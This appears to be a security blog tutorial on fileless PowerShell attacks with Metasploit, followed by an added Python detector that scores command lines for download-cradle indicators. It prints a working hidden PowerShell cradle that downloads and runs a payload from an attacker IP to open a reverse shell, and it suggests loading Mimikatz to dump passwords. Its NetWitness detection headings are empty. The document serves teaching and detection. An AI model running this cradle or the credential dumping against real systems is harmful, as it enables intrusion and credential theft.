Fileless infection is a method used to compromise a system without writing any file to disk. This allows the attacker to remain stealthy and to avoid detection by antivirus, EPP and EDR solutions whose detection relies on files.
We will look at:
- How to perform the attack
- How to detect it with RSA NetWitness
Testing the Attack
We can now execute the payload:
To gain a reverse shell on the victim, we just need to execute the following command (no malware is installed and nothing is written to disk; everything happens in memory), replacing the URL at the end with the one printed by Metasploit under "Local IP" (your IP address and the randomly generated filename):
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://192.168.1.3:8080/VpBSRDO')
We can now see that we have an active session in Metasploit.
We could then load Mimikatz into memory to dump passwords, again without touching the disk. First, interact with the session from the Metasploit console:
sessions -i 1
Visibility into, and detection of, such attacks is possible using RSA NetWitness Packets and RSA NetWitness Endpoint.
Using RSA NetWitness Packets
Using RSA NetWitness Endpoint
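The PowerShell download cradle above leaves no file on disk, but it still produces a process-creation event whose command line carries several strong indicators (hidden window, WebClient, DownloadString, IEX, a URL with a bare IP address). The following is an added example, not part of the original post and not RSA NetWitness code, showing the kind of command-line scoring an endpoint sensor can apply; the sample events are constructed and the weights and threshold are assumptions.

```python
import re

# Constructed sample process-creation records (Sysmon/4688-style telemetry), not taken from the page.
SAMPLE_EVENTS = [
    {"pid": 4312, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c $k=new-object net.webclient;"
                "$k.proxy=[Net.WebRequest]::GetSystemWebProxy();"
                "IEX $k.downloadstring('http://192.168.1.3:8080/VpBSRDO')"},
    {"pid": 5001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 5100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

# Each indicator is a case-insensitive regex with an assumed weight and a description.
# The cradle in the post combines most of them in a single command line, so the
# score separates it from ordinary administrative PowerShell use.
INDICATORS = [
    (r"\bnet\.webclient\b", 2, "WebClient object created"),
    (r"downloadstring|downloadfile|downloaddata", 2, "remote content fetched"),
    (r"\biex\b|invoke-expression", 3, "downloaded text executed in memory"),
    (r"-w(indowstyle)?\s+hidden", 1, "hidden window"),
    (r"-nop\b|-noprofile", 1, "profile skipped"),
    (r"https?://\d{1,3}(\.\d{1,3}){3}", 1, "URL with bare IP address"),
]


def score_command_line(cmdline):
    """Return (score, matched descriptions) for one process command line."""
    score, matched = 0, []
    for pattern, weight, description in INDICATORS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            score += weight
            matched.append(description)
    return score, matched


def detect_download_cradles(events, threshold=5):
    """Return the events whose command line scores at or above the (assumed) threshold."""
    hits = []
    for event in events:
        score, matched = score_command_line(event["cmdline"])
        if score >= threshold:
            hits.append({**event, "score": score, "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in detect_download_cradles(SAMPLE_EVENTS):
        print(f"pid {hit['pid']} score {hit['score']}: {', '.join(hit['indicators'])}")
```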